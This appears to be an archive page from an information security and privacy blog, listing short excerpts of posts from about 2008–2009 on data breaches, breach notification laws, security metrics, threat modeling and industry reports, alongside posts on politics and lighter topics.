aka it’s not nearly as funny when you are the subject of the probe. At a recent conference Justice Scalia said “Every single datum about my life is private? That’s silly,” Well, a professor at Fordham University decided to take Mr Scalia at his word, and had one of his classes collect a dossier on […]

 

"No Evidence" and Breach Notice

According to ZDNet, “Coleman donor data breached in January, but donors alerted by Wikileaks not campaign:” Donors to Minnesota Senator Norm Coleman’s campaign got a rude awakening this week, thanks to an email from Wikileaks. Coleman’s campaign was keeping donor information in an unprotected database that contained names, addresses, emails, credit card numbers and those […]

 

@Mortman MP3d on Threat Post

I’ll go ahead and promote David.  He’s interviewed over at Threat Post.  Pod/Talk cast it up! In this episode of the Digital Underground podcast, Dennis Fisher talks with David Mortman, CSO-in-residence at Echelon One and longtime security executive, about whether we’ve become too reliant on compliance, the changing nature of the CSO’s job and how […]

 

Security is about outcomes: RSA edition

So last week I asked what people wanted to get out of RSA, and the answer was mostly silence and snark. There are some good summaries of RSA at securosis and Stiennon’s network world blog, so I won’t try to do that. But I did I promise to tell you what I wanted to get […]

 

More breach visualization

I received some excellent comments on my previous breach visualization post, which I wanted to highlight for EC readers and take a stab at addressing.

 

Breach Visualization

I took the latest DataLossDB.org breach database and extracted all breaches involving a third party, omitting all columns other than the reporting entity and the third party. I then ran the resulting two-column CSV file through afterglow, and finally made pretty (3MB) picture with graphviz. This was done more for fun than for insight, but […]

 

Little Bobby Drop tables

In 1999 Syse Data was converted to a limited liability company, and has since been trading under the name Syse Data AS[1]. As the names are so similar, searches for our company in the official Norwegian registry of just-about-anything (Brønnøysundregistrene) often resulted in potential customers looking up the wrong company. To prevent this confusion we […]

 

Dept. of Pre-Blogging: Swine Flu edition

In no particular order, your friendly neighborhood Dept. of Pre-blogging hereby predictively reports on: Increased speculation, coupled with a spike in Twitter activity. Politicization of the event from the Right (blame Mexico and/or Big Government), the Left (if we spent money in the right places, this would not happen), and out in left field (this […]

 

Congratulations, Open Security Foundation

The Open Security Foundation, creators of OSVDB and DataLossDB have won SC Magazine’s Editor’s Choice award for 2009. It’s well deserved. In other Open Security Foundation News, about a dozen people asked me how to get a stylin’ DataLossDB t-shirt. It’s pretty easy-donate. I think you get one at the $100 level.

 

Congratulations to the Social Security Blog award winners!

A huge congratulations to the winners of the Social Security Awards [on Wednesday] PaulDotCom won the Best Podcast Award, the crew at the SANS Internet Storm Center won the best Technical Blog award, the best Non-Technical Blog went to Richard Bejtlich of the TaoSecurity Blog, Sunbelt Security won the Best Corporate Blog and Mike Rothman […]

 

Registration now open for WEIS 2009

Registration for The Eighth Workshop on the Economics of Information Security (WEIS 2009) is now open. The deadline for the Early Bird registration is 1 June 2009. We’ve written here often (and favorably) about WEIS, and about papers delivered there.

 

Standing Still

Following up on Ben’s comment to s/green/secure/g, infosec generally makes life /harder/ for people (at least in the short-term), all to keep bad things from happening. I’ll argue it’s even worse than that. Since “secure” is neither achievable nor a static state, it can never be done and standing still means falling behind.  One of […]

 

s/green/secure/g

Don’t miss this fascinating article in the New York Times, “Why Isn’t the Brain Green?” You can read it for itself, but then you hit paragraphs like this: It isn’t immediately obvious why such studies are necessary or even valuable. Indeed, in the United States scientific community, where nearly all dollars for climate investigation are […]

 

Breach Notification Law Across the World

“Data Breach Notification Law Across the World from California to Australia” by Alana Maurushat. From the abstract: The following article and table examine the specifics of data breach notification frameworks in multiple jurisdictions. Over the year of 2008, Alana Maurushat of the Cyberspace Law and Policy Centre, with research assistance from David Vaile and student […]

 

Who should be punished for torture?

Normally, I try to post funny bits over the weekend, but I can’t let this week’s news slip by. I have deeply mixed feelings about how to handle those who tortured. On the one hand, they were only following orders. On the other hand, they were following orders which clearly required contortions to see as […]

 

Project Quant: Patch Management Metrics

Rich Mogull, Adrian Lane, (of Securosis) and Jeff Jones (of Microsoft) have started a “transparent” metrics project “to help build an independent model to measure the costs and effectiveness of patch management.”  They’re calling it (for now) Project Quant.  As you can probably guess, I’m all for transparent metrics projects, and I hope you’ll at […]

 

Off to the Moscone Center

Every year around this time, thousands of people converge on the Moscone Center in San Francisco for RSA. I had never given much thought to who Moscone was–some local politician I figured. I first heard about Harvey Milk in the context of the Dead Kennedys cover of I Fought The Law: The law don’t mean […]

 

Evolution of Information Analysis

Real briefly, something that came to me reading Marcus Ranum over at Tenable’s Blog. Marcus writes: Usually, when I attack pseudo-science in computer security, someone replies, “Yes, but some data is better than none at all!”  Absolutely not true! Deceptive, inaccurate, and misleading data is worse than none at all, because it can encourage you […]

 

Black Swan-Proof InfoSec?

I came across an interesting take on Nassim Taleb’s “Black Swan” article for the Financial Times via JP Rangaswami’s blog “Confused in Calcutta”. Friends and folks who know me are probably tired of my rants about what I think of Taleb’s work and what I think he’s gotten wrong. But really, I find his FT […]

 

A Curmudgeon is a Little Confused by the 2009 DBIR

I’ve given Vz’s DBIR a quick perusal.  The data are interesting indeed and the recommendations are obvious.  There is little new here in the way of recommendations – I guess nobody is listening or the controls are ineffective (or a bit of both). Regardless, I have a few items that confuse and irritate me a […]

 

Breaches Conference audio online

Back in March, the Berkeley Center for Law and Technology put on a great conference, the “Security Breach Notification Symposium.” It was a fascinating day, and the audio is now online.

 

Initial Thoughts on the 2009 Verizon DBIR

Last night, the fine folks at Verizon posted the 2009 version of the DBIR.  I haven’t had time to do a full deep dive yet, but I thought I’d share my initial notes in the meantime. Stuff in italics is from the DBIR, regular text is me: 81 percent of organizations subject to PCI DSS […]

 

How to be Cyberscary

The intersection of crime and technology is a fascinating place. Innovation of fraud, theft, and industrial espionage is occurring at a phenomenal pace and is producing no shortage of real problems that Information Risk and Security professionals need to be learning about and addressing. Unfortunately, the noise coming from journalists in this space is so […]

 

Events don't happen in a Vacuum

Several commenters on yesterday’s post brought up the excellent point that it’s hard to talk about outcomes when you think you haven’t had any incidents. (“Consider the bank that had no attempted robberies this year”) Are you right? With a bank, it’s pretty easy to see most robberies. What’s more, we have the FBI showing […]

 

The New School Blog

I’m really excited to announce NewSchoolSecurity.com, the blog inspired by the book. I’ll be blogging with Alex Hutton, Chandler Howell and Brooke Paul. And who knows, maybe we’ll even get a post or two from Andrew? Emergent Chaos will continue. My posts here will be a little more on the privacy, liberty and economics end […]

 

Security is about outcomes, not about process

In some migration or another, this post was duplicated; the real post is at https://adam.shostack.org/blog/2009/04/security-is-about-outcomes-not-about-process/. Editing to avoid linkrot

 

Security is about outcomes, not about process

Nearly a decade ago Bruce Schneier wrote “Security is a process, not a product.” His statement helped us advance as a profession, but with the benefit of hindsight, we can see he’s only half right. Security isn’t about technology. Security is about outcomes, and our perceptions, beliefs and assurance about those outcomes. Here’s a quick […]

 

Microsoft Security Intelligence Report

The Microsoft SIR was released 4/8 and is available for download here.  Some of the interesting stuff they put in graphs is from the Open Security Foundation’s OSF Data Loss Database (http://datalossdb.org).  Among the interesting things in the Microsoft SIR: Good old theft and losing equipment, when combined, still beats the sexier categories hands down. […]

 

Flinging Money Around Never Works

“Freeway Drivers Grab Money as Suspects Toss Thousands During Police Chase:” Thousands of dollars worth of hundred dollar bills brought rush hour to an abrupt halt on two San Diego freeways. Drug suspects tossed the money from their car as they were chased by police. Other drivers saw the money and stopped their cars on […]

 

New School Bloggers Speaking Today

So I apologize for short notice.  Hopefully the webmaster will get in gear and put up an event calendar or something, but here are a couple of events you might want to attend today that New School Bloggers are speaking at. First, David Mortman is giving “The Mortman Briefing:  Metrics for the Real World”over at […]

 

Cyber-Spies!

The WSJ has an article up today about how the Russians and Chinese are mapping the US electrical grid. What I thought was more interesting was the graph they used (which is only mildly related to the article itself). If I’m reading this correctly, the DHS is claiming that there were just under 70,000 breaches […]

 

Hello World?

Thanks for stopping by The New School of Information Security Blog.  We’re very “beta” right now, and anticipate having everything ready by the RSA conference (the week of the 17th).  If you’d like to see some recent content by our authors, I had a recent post on the Verizon/Cybertrust blog about the PCI DSS and […]

 

Building Security In, Maturely

While I was running around between the Berkeley Data Breaches conference and SOURCE Boston, Gary McGraw and Brian Chess were releasing the Building Security In Maturity Model. Lots has been said, so I’d just like to quote one little bit: One could build a maturity model for software security theoretically (by pondering what organizations should […]

 

Deadline extended: Computers, Freedom & Privacy Research Showcase

This year’s Computers, Freedom and Privacy Conference will feature a research showcase in the form of a research poster session as well as a research panel that includes the authors of the best research posters. CFP is the leading policy conference exploring the impact of the Internet, computers, and communications technologies on society. For more […]

 

I Know What I Know

and I’ll sing what he said. Ethan Zuckerman has two great posts lately: “From protest to collaboration: Paul Simon’s “Graceland” and lessons for xenophiles” and “Argentine economics and maker culture.” The Paul Simon post talks about the deep history of the Apartheid boycott, Paul Simon’s approach to creating Graceland. Graceland was a collaboration of the […]

 

Mo-mentum on centralized breach reporting?

A Missouri state bill requiring notification of the state attorney general as well as of individuals whose records have been exposed just took a step closer to becoming law. As reported in the St. Louis Business Journal on April 1: Missouri businesses would be required to notify consumers when their personal or financial information is […]

 

Torture is a Best Practice

I was going to title this “Painful Mistakes: Torture, Boyd and Lessons for Infosec,” but then decided that I wanted to talk about torture in a slightly different way. The Washington Post reports that “Detainee’s Harsh Treatment Foiled No Plots” and [UK Foreign & Commonwealth Office] Finally Admits To Receiving Intelligence From Torture. From the […]

 

Metricon 4.0 Call for Papers

I suspect at least some EC readers will be interested in the Call for Papers for Metricon 4.0, to be held in Montreal, August 11. Metricon 4 – The Importance of Context MetriCon 4.0 is intended as a forum for lively, practical discussion in the area of security metrics. It is a forum for quantifiable […]

 

Would I self-publish?

A few weeks back, Dave Birch asked me if I’d publish my next book myself. I don’t think I would. I’m really happy with Karen Gettman and Jessica Goldstein at Addison Wesley, and I’ve convinced my co-authors for my next book that we should have a discussion about publishers. So why am I happy with […]

 

Brad DeLong on the bailout

Brad DeLong has a FAQ up about Geithner’s plan to purchase toxic assets on the theory that the market has undervalued them, and will in time price them properly. Among the items: Q: What if markets never recover, the assets are not fundamentally undervalued, and even when held to maturity the government doesn’t make back […]

 

Best Practices?

The BBC reports that the UK Local Government Association has a new banned words list, including our favorite, “best practices.” Andrew asked me in email if this was a best practice, and I wrote back: Does it pass the seven whys test? Why did they ban the phrase? Because it’s meaningless business speak Why is […]

 

Double-take Department, Madoff Division

The Daily Beast has a fascinating article that is a tell-all from a Madoff employee. I blinked as I read: The employee learned the salaries of his colleagues when he secretly obtained a document listing them. “A senior computer programmer would make $350,000, where in most comparable firms they would be getting $200,000 to $250,000….” […]

 

The Emergent Chaos of Kutiman

So when someone sent me a link to “The Mother of all Funk Chords,” they didn’t explain it, and I didn’t quite get what I was watching. What I was watching: …is a mash up of videos found on YouTube, turned into an entire album by an Israeli artist, Kutiman.

 

Joseph Ratzinger and Information Security

Joseph Ratzinger (a/k/a Benedict XVI) recently made some comments that got some press. In particular, as Reuters reports: “Pope in Africa reaffirms ‘no condoms’ against AIDS.” Quoting the story, “The Church teaches that fidelity within heterosexual marriage, chastity and abstinence are the best ways to stop AIDS.” Many of you are likely […]

 

Twitter + Cats = Awesome

My smart friend James Thomson of TLA Systems has created a new benchmark in iPhone applications, Twitkitteh. Not only is it the first Twitter client for cats, but it might also be the first iPhone app for cats, as well. I’ve always accused my cats of playing the stereo when I’m not there, and it […]

 

Understanding Users

Paul Graham has a great article in “Startups in 13 Sentences:” Having gotten it down to 13 sentences, I asked myself which I’d choose if I could only keep one. Understand your users. That’s the key. The essential task in a startup is to create wealth; the dimension of wealth you have most control over […]

 

What you talkin' 'bout?

The 110-story Sears Tower, tallest office building in the Western Hemisphere, will be renamed the Willis Tower, global insurance broker Willis Group Holdings said on Thursday. Willis said it was leasing multiple floors in the 1,451-foot (442-meter) structure in downtown Chicago to consolidate offices. As part of the deal, it will become the Willis Tower […]

 

Open Thread

I’d give you a topic, but I’m taking Hilzoy’s advice and going Galt. I’ve taken ads off the blog, given up my lucrative contract for Harry Potter and the Half-Baked Firewall, and so turn this thread over to you with but a single request: civility. So what’s on your mind?

 

The Latest Big Processor Breach

So it’s now roughly confirmed, except for a few denials from Visa. First there was CardSystems, then Heartland, and maybe there’s at least one more known-to-some criminal breach at a payments processor. A lot of security bloggers have been talking about this, but I figure another day, another breach. Can’t we just get some facts? […]

 

This Data Will Self-Destruct in 5 Seconds

CSO Online has a good article on data destruction, “Why Information Must Be Destroyed.” It’s mostly about physical documents, not data, but I can still make a few quibbles. The author, Ben Rothke, gives an example of a financial institution that did not live up to its regulatory requirements for properly disposing documents, and was […]

 

Welcome To The (New) Machine

If you can read this, you are now reading Emergent Chaos on its new server. We’ve also upgraded to the 4.x train of MovableType. Let us know what you think. We’re also considering a site redesign, so let us know any feature requests or design suggestions. Thanks!

 

SDL Threat Modeling Tool 3.1.4 ships!

On my work blog, I wrote: We’re pleased to announce version 3.1.4 of the SDL Threat Modeling Tool. A big thanks to all our beta testers who reported issues in the forum! In this release, we fixed many bugs, learned that we needed a little more flexibility in how we handled bug tracking systems (we’ve […]

 

Security Breach Notification Symposium

Next Friday (March 6th) I’ll be speaking at the “Security Breach Notification Symposium:” A one-day symposium on identity theft and security breaches. Experts from law, government, computer science, and economics will discuss laws that protect personal information and suggest reforms to strengthen them. Although most agree that reforms are needed, leading thinkers clash on what […]

 

Congratulations, Justin!

Justin Mason has won the 2009 Irish Blog Award for Best Technology Blog/Blogger. I don’t know how Justin manages to stay engaged with his blog and others while getting so much work done. When I say others, I mean this blog. Justin found Emergent Chaos back when it was a solo gig and I was […]

 

Don't put Peter Fleischer on Ice

Peter Fleischer is Google’s chief privacy counsel. I met Peter once at an IAPP event, and spoke pretty briefly. We have a lot of friends and colleagues in common. He’s now threatened with three years of jail in Italy. Google took under 24 hours to remove a video which invaded the privacy of someone with […]

 

Who Watches the FUD Watcher?

In this week’s CSO Online, Bill Brenner writes about the recent breaks at Kaspersky Labs and F-Secure. You can tell his opinion from the title alone, “Security Vendor Breach Fallout Justified” in his ironically named “FUD watch” column. Brenner watched the FUD as he spreads it. He moans histrionically, When security is your company’s business, […]

 

MI5 Head Critiques Government on Liberties

The BBC reports: A former head of MI5 has accused the government of exploiting the fear of terrorism to restrict civil liberties. Dame Stella Rimington, 73, stood down as the director general of the security service in 1996…”Furthermore it has achieved the opposite effect – there are more and more suicide terrorists finding a greater […]

 

Closing the Collapse Gap

There’s a very interesting annotated presentation at “Closing the ‘Collapse Gap’: the USSR was better prepared for collapse than the US.” In it, Dmitry Orlov lays out his comparison between the USSR and the USA of 2006. Posting this now because a talk he gave at Long Now is getting lots of attention. In closely […]

 

Daily Show on Privacy

(h/t to Concurring Opinions) The Daily Show With Jon Stewart: “Bill O’Reilly’s Right to Privacy”

 

Why Didn't SOX Catch The Bank Failures?

Iang recently indicted the entire audit industry with “Two Scary Words: Sarbanes-Oxley”. I’ve excerpted several chunks below: Let’s check the record: did any audit since Sarbanes-Oxley pick up any of the problems seen in the last 18 months to do with the financial crisis? No. Not one, not even a single one! Yet, the basic […]

 

$450 per account? No.

So there’s a claim going around, which is that I believe that a breach costs $450 per account. That claim is not accurate. What was said (and the interview was in email, so I can quote exactly): (Interviewer) The Hannaford breach resulted in more than $318,000 in gross fraud losses, according to data reported by […]

 

"A Scientific R&D Approach to Cyber Security"

Charlie Catlett, CIO of Argonne National Labs has released a report on “A Scientific R&D Approach to Cyber Security” (Powerpoint summary, community wiki). It’s a very interesting report. There’s a lot to agree with in terms of a research agenda. They’re looking to compose trustworthy systems from untrusted components, to create self-protective data and software, […]

 

Public Perception of Security

So the US Consulate in Jerusalem sold a file cabinet full of secret documents. What I found interesting about the story is the perception of the finder: Hundreds of files — with social security numbers, bank account numbers and other sensitive U.S. government information — were found in a filing cabinet purchased from the U.S. […]

 

That's some fine discourse, Professor Froomkin

I just wanted to draw attention to the comments in Michael Froomkin’s blog post on “Cabinet Confirmation Mechanics.” I am delighted to have had ‘Jim’ concur with my Constitutional analysis by quoting the closing lines of Ulysses. I’m in awe of your commenters, Michael.

 

"EPC RFID Tags in Security Applications"

I just finished an interesting paper, K. Koscher, A. Juels, T. Kohno, and V. Brajkovic. “EPC RFID Tags in Security Applications: Passport Cards, Enhanced Drivers Licenses, and Beyond.” In the paper, they analyze issues of cloning (easy), read ranges (longer than the government would have you believe) and ‘design drift’ (a nice way of saying […]

 

Request your travel records

Speaking of how you’re presented and perceived…”How to request your travel records,” by Ed Hasbrouck. By popular demand, I’m posting updated forms to request your PNR’s and other records of your international travel that are being kept by the U.S. Customs and Border Protection (CBP) division of the Department of Homeland Security (DHS)… If you […]

 

A nudge in the right direction?

I am surprised I hadn’t heard about the book Nudge, by Cass Sunstein and Richard Thaler. I haven’t read it yet, but from the web page it seems to be about how policymakers can take into account the heuristics and biases characteristic of human decision-makers and create a choice architecture which yields “proper” decision-making. I […]

 

Abuse of the Canadian Do Not Call List

The Globe and Mail and the CBC each report that Canada’s Do Not Call list is being used by telemarketers both good and bad (where each term is relative). This is a bit sad for Canada. The US’s DNC list has been very successful, and one of the very few places where the US has […]

 

The New Administration and Security

Quoting first from Obama’s inaugural address: The question we ask today is not whether our government is too big or too small, but whether it works — whether it helps families find jobs at a decent wage, care they can afford, a retirement that is dignified. Where the answer is yes, we intend to move […]

 

Pinch me…

The Freedom of Information Act should be administered with a clear presumption: In the face of doubt, openness prevails. The Government should not keep information confidential merely because public officials might be embarrassed by disclosure, because errors and failures might be revealed, or because of speculative or abstract fears. Nondisclosure should never be based on […]

 

Breach Misdirection

While we were all paying attention to the Inauguration and having merry debates about how many Justices can deliver the Oath of Office on a pin, what may be the biggest breach ever tried to tiptoe past. Heartland Payment Systems may have lost 100 million credit card details, surpassing the 94 million that was lost […]

 

Rethinking Risk

Now it’s no secret to those of you who know me that I’m a big believer in using risk management in the security space. Iang over at Financial Cryptography thinks it is “a dead duck”: The only business that does risk management as a core or essence is banking and insurance (and, banking is debatable […]

 

President for Ten Minutes

During a chat I had this afternoon, someone brought up an interesting situation to contemplate. The Presidency of George Bush fils ended today at noon EST, but Mr. Obama wasn’t sworn in until 12:10. Who then, the question was, was President during those ten minutes? One mildly unsatisfactory answer is Ms. Pelosi. If there is neither […]

 

Change I Can Believe In

From (the new) Whitehouse.gov: Except where otherwise noted, third-party content on this site is licensed under a Creative Commons Attribution 3.0 License. Visitors to this website agree to grant a non-exclusive, irrevocable, royalty-free license to the rest of the world for their submissions to Whitehouse.gov under the Creative Commons Attribution 3.0 License. http://www.whitehouse.gov/copyright/

 

Three short comments on the Inauguration

The reality that a black man is about to become President of the United States is both momentous and moving. It’s hard to say anything further on the subject that hasn’t been said and re-said, but I am simply proud that the pendulum has swung to someone like Obama. I’m excited to have an educated, […]

 

Umami, or why MSG tastes so good

It’s appetizing news for anyone who’s ever wanted the savory taste of meats and cheeses without actually having to eat them: chemists have identified molecular mechanisms underlying the sensation of umami, also known as the fifth taste. … The umami receptor’s shape is similar to that of sweetness receptors, he said, and his team’s research […]

 

Privacy & Healthcare

One of the dirty little secrets of bad privacy law is that it kills. People who are not comfortable with the privacy of their medical care may avoid getting needed care. That’s why privacy features in the Hippocratic oath. But few people want to study this issue, and studying it is hard–people are likely to […]

 

"Get FISA Right" Pointer

[Update: This got to #5 on change.org’s list, and they’re now working to draw attention to the issue on change.gov.] Jon Pincus has asked me for help in drawing attention to his “Get FISA Right” campaign to get votes on change.org. When I’ve tried to look at this, it’s crashed my browser. YMMV–I use a […]

 

Security Blog Awards

In “The Social Security Blogger Awards,” Alan Shimel asks for nominations for blogs. Ironically, to even see the site at http://www.socialsecurityawards.com/, you need to accept Javascript. I think we should have an award for “best vuln in the voting system.” But anyway, please take a minute to go vote. I’ll ask for your vote for […]

 

Patch and Pray…

…or, Spaf’s DVD players get bricked. In which, lies a tale…

 

Protection Poker

Listening to Gary McGraw’s Silver Bullet #33, Laurie Williams mentioned protection poker. Protection poker, like planning poker, isn’t really poker. Planning poker is a planning exercise, designed to avoid certain common pitfalls of other approaches to planning. The idea behind protection poker is to be an “informal form of misuse case development and threat modeling […]

 

Look how hip I am…

Normally, this would be something for Twitter, but…well…. Officiating at the NY v. Philadelphia game has been poor. Not biased, I don’t think, but poor.

 

Gary McGraw and Steve Lipner

Gary McGraw has a new podcast, “Reality Check” about software security practitioners. The first episode features Steve Lipner. It’s some good insight into how Microsoft is approaching software security. I’d say more, but as Steve says two or three good things about my threat modeling tool, you might think it some form of conspiracy. You […]

 

Reboot the FCC? No, debug the problem

Larry Lessig has a very interesting article in Newsweek, “Reboot the FCC.” The essence is that the FCC is inevitably bound by regulatory capture. He proposes a new agency with three tasks: “The iEPA’s first task would thus be to reverse the unrestrained growth of these monopolies.” “The iEPA’s second task should be to assure […]

 

No Fun

Stooges guitarist Ron Asheton, dead at 60.

 

ITRC Year End Report for 2008

The Identity Theft Resource Center (ITRC) released their year-end breach report: Reports of data breaches increased dramatically in 2008. The Identity Theft Resource Center’s 2008 breach report reached 656 reported breaches at the end of 2008, reflecting an increase of 47% over last year’s total of 446. Dissent of PogoWasRight has some analysis. I’ll take […]

 

Cryptol Language for Cryptography

Galois has announced “” Cryptol is a domain specific language for the design, implementation and verification of cryptographic algorithms, developed over the past decade by Galois for the United States National Security Agency. It has been used successfully in a number of projects, and is also in use at Rockwell Collins, Inc. … Cryptol allows […]

 

The Identity Divide and the Identity Archipelago

(I’d meant to post this in June. Oops! Chaos reigns!) Peter Swire and Cassandra Butts have a fascinating new article, “The ID Divide.” It contains a tremendous amount of interesting information that I wasn’t aware of, about how infused with non-driving purposes the drivers license is. I mean, I know that the ID infrastructure, is, […]

 

Security through obscurity

…or, antique car collectors are an honest lot. According to the Times (of London, dear chap), a recently-deceased British surgeon has left his heirs a rather significant bequest: a super-rare, super-fast, antique Bugatti which hasn’t been driven since 1960 and is expected to fetch several million at auction. This is the fabled “Imagine their surprise, […]

 

Biometric Fail reported

A South Korean woman entered Japan on a fake passport in April 2008 by slipping through a state-of-the-art biometric immigration control system using special tape on her fingers to alter her fingerprints, it was learned Wednesday… During questioning, the woman allegedly told the immigration bureau that she had bought a forged passport from a South […]

 

Happy New Year!

Our new year’s resolution is to show a sense of childlike wonder at and acceptance of everything we come across, especially this year’s leap second. Incidentally, this post is scheduled to go live at 2008-12-31 23:59:60. Let’s see what happens! Update: Movable Type complained when I tried to save the post: “Invalid date ‘2008-12-31 23:59:60’; […]

 

Now will you believe MD5 is broken?

I’m just sitting here blinking, having a Brecht moment in which I am laughing at those who are crying and crying at those who are laughing. At the CCC congress, a number of people did something dramatic — they created a forged SSL certificate. It’s dramatic, but nothing special. We’ve known that MD5 is broken […]

 

Happy Newton, everyone!

In honor of Newton’s Birthday festival, I therefore propose the following song, to be sung to the tune of “The Twelve Days of Christmas.” For brevity, I include only the final verse. All together now! On the tenth day of Newton, My true love gave to me, Ten drops of genius, Nine silver co-oins, Eight […]

 

I miss Montreal

When Seattle is covered in snow, it’s easy to miss Montreal. Now, folks in areas that get lots of snow like to make fun of Seattlites for being unable to handle a little snow, but it turns out that there’s another reason (beyond the steep hills) the city has a (ahem) unique approach: “Seattle refuses […]

 

At the tail end of the car series…

Originating from Wootton High School, the parent said, students duplicate the license plates by printing plate numbers on glossy photo paper, using fonts from certain websites that “mimic” those on Maryland license plates. They tape the duplicate plate over the existing plate on the back of their car and purposefully speed through a speed […]

 

Designing Cars

I was struck by this quote in “Edgy, Yet Still Aerodynamic,” an article in the New York Times about how new cars are being designed and tested: To his surprise, in hundreds of tests at Ford’s Wind Tunnel 8 southwest of Detroit the original edges produced less drag than curved substitutes, Mr. Koester said. […]

 

This is the farewell shoe, you dog

Bloomberg is reporting that “Shoe Hurled at Bush Flies Off Turkish Maker’s Shelves:” Baydan has received orders for 300,000 pairs of the shoes since the attack, more than four times the number his company sold each year since the model was introduced in 1999. The company plans to employ 100 more staff to meet […]

 

Thoughts on the Somali Pirates

Stratfor’s podcast on the seizure of that Saudi oil tanker contained a fascinating tidbit: merchant ships are no longer allowed to carry arms at all, which, of course, makes piracy far easier. This is a dramatic transformation of the rights of merchant ships. Historically, private ships carried weapons when sailing far out of their own […]

 

Evidence of Time Travel Found in China

According to Ananova, a Swiss watch-ring has been found covered in dirt in a four-hundred year old Ming dynasty tomb. The watch was found, covered in dirt. It was stopped at the time 10:06 and has the word, “Swiss” engraved on the back. The archaeologists on the dig have requested archaeologists from Beijing to help […]

 

Happy Boston Tea Party Day!

It was 235 years ago today that the Sons of Liberty threw tea into Boston harbor, and they still haven’t been able to clean the place up. Please join me in celebrating this most American response to taxation.

 

Do Security Breaches Cost Customers?

Adam Dodge, building on research by Ponemon and Debix, says “Breaches Cost Companies Customers,” and Alan Shimel dissents in “Do data breaches really cost companies customers?” Me, I think it’s time we get deeper into what this means. First, the customers. Should they abandon a relationship because the organization has a security problem? To answer […]

 

Privacy Rights & Privacy Law

First, the European Court of Human Rights has ruled that the UK’s “DNA database ‘breach of rights’:” The judges ruled the retention of the men’s DNA “failed to strike a fair balance between the competing public and private interests,” and that the UK government “had overstepped any acceptable margin of appreciation in this regard”. The […]

 

Eric Drexler blogging

At Metamodern.com. Way cool. I look forward to what he has to say. Unfortunately, one of his early posts falls into the trap of believing that “Computation and Mathematical Proof” will dramatically improve computer security: Because proof methods can be applied to digital systems, and in particular, will be able to verify the correctness (with […]

 

DataLossDB announces awesome new feature

The Data Loss Database, run by the Open Security Foundation, now has a significant new feature: the inclusion of scanned primary source documents. This means that in addition to being able to determine “the numbers” on an incident, one can also see the exact notification letter used, the reporting form submitted to state government, cover […]

 

Videos of me

The employer has been posting them at a prodigious rate. There’s: “Threat Modeling at EMC and Microsoft,” Danny Dhillon of EMC and myself at BlueHat. Part of the BlueHat SDL Sessions. Also on threat modeling, Michael Howard and I discuss the new SDL Threat Modeling Tool Michael Howard and I also discussed the new SDL […]

 

The Costs of Fixing Problems

I enjoyed reading Heather Gerken’s article: “The Invisible Election.” I am one of the few people to have gotten a pretty good view of the invisible election, and the reality does not match the reports of a smooth, problem-free election that have dominated the national media. As part of Obama’s election protection team, I spent […]

 

Virgin America

I flew Virgin Atlantic for the first time recently, for a day trip to San Francisco. I enjoyed it. I can’t remember the last time I actually enjoyed getting on a plane. The first really standout bit was when the Seattle ground folks put on music and a name that song contest. They handed out […]

 

Travel Chaos

NARA (National Archives) published notice in the Federal Register on October 27, 2008, of TSA’s submission to them (see Schedule Pending #3) of a proposed Records Schedule for Secure Flight Program. The actual Proposed Schedule was not published in the Register, only notice that you can request it and file comments on whether NARA should […]

 

Terrifying Financial Blacklists Falling Down

There’s a list, maintained by the UN security council, of people who can’t have their money. Once you’re on the list, there’s no way to get off. The global blacklisting system for financiers of al-Qaeda and other terrorist groups is at risk of collapse, undermined by legal challenges and waning political support in many countries, […]

 

Ephemeral Anniversary

Yesterday, Nov 17, was the sesquicentenary of the zero-date of the American Ephemeris. I meant to write, but got distracted. Astronomical ephemeris counts forward from this date. That particular date was picked because it was (approximately) Julian Day 1,000,000, but given calendar shifts and all, one could argue for other zero dates as well. The […]

 

Diverse Preferences for Privacy

A Wide Diversity of Consumer Attitudes about Online Privacy shows this picture of Flickr users setting privacy preferences: green is public (default) and red is private. I hope Flickr shares some of the underlying data. I don’t know what anyone would do with it, and there’s two ways to find out. One is to talk, […]

 

The Twain Meeting

Some time ago, I was on an extended stay in Tokyo for work. When one is living there, there are things one must do, like make an effort to live up to being a henna gaijin. I must disagree with those who translate that as “strange foreigner.” The proper translation is “crazy foreigner.” I’d never heard […]

 

Actually, Randall, We Tried That

And the reason it doesn’t work is that just because you’re allowed to own something doesn’t mean you’re allowed to export it. The use, ownership, production, etc. of crypto was never restricted, only its export. In an Internet-enabled world, export control brings lots of hair with it, which is why it was important to fight […]

 

Public Policy and InfoSec

…Armed with my favorite govie (who is actually the lead on this, I’m just a straphanger), The New School of Information Security (Hi Adam and Andrew), some government policy directives, and the National Strategy to Secure Cyberspace, I am teaching an Information Security Management and Public Policy class for Carnegie Mellon’s Heinz School. The more […]

 

An early clue to the new direction?

Obama gave his first press conference as President-elect last Saturday. Pundits have noted his humor in responding to the urgent canine matter, but I was struck by a particular phrase used in response to a question regarding whether he’d be moving quickly to fill key cabinet positions: When we have an announcement about cabinet appointments, […]

 

Chaos, My Desk and Dilbert

The Wall St Journal covers the latest management fad in “Neatness Counts at Kyocera and at Others in the 5S Club:” 5S is a key concept of the lean manufacturing techniques that have made makers of everything from cars to candy bars more efficient. The S’s stand for sort, straighten, shine, standardize and sustain. Lately, […]

 

I Was On NPR, An Unmasking of Sorts

Okay so for a long time now, I’ve been blogging as Arthur. It all started as an excuse to blog without the company I worked for at the time having to worry about anything I said being a reflection on them. Almost three years ago they were acquired by Oracle and I have long since […]

 

Checking in on the Security of Chequing

I remember a conversation back in 1995 or 1996 with someone who described to me how the Automated ClearingHouse (ACH) for checking worked. He explained that once you had an ACH merchant account, you sent in a message of roughly the form (src, dest, amount, reason) and money got moved. I argued with him that […]

 

This just in!!

MSNBC’s live streaming internet election coverage looks like it was filmed from within Second Life. Yuck.

 

The Purple States

As we go into what may well be another very long day of elections for the Presidency of the United States, I wanted to reprise two images from 2004: Click on either for more details and the context four years ago. Despite the electoral college, America isn’t a red country or a blue country, and […]

 

You talk like a delinquent

This is interesting. Not sure how robust the finding is, but according to an analysis of LendingClub data on all past loans, including descriptions of the use for the money, applicants using certain words in their descriptions are much more likely to default. For our purposes define a Delinquency as either being late in your […]

 

Thoughts about Democracy in America

There’s a place in de Tocqueville where he talks about America’s civic strength coming from the way we organize: those voluntary organizations which come together to solve a problem as a community. He pointed out that what we got from that was not merely that particular problem solved, but a sense of community and a […]

 

It was twenty years ago today

It was twenty years ago today Sgt. Morris taught the worms to play They’ve been going in and out of style But they’re guaranteed to last a while So may I introduce to you… the bug you’ve known for all these years Sgt. Morris Lonely worm club band We’re Sgt. Morris’ lonely worm club band, […]

 

Don’t Stay at the Renaissance Amsterdam Hotel

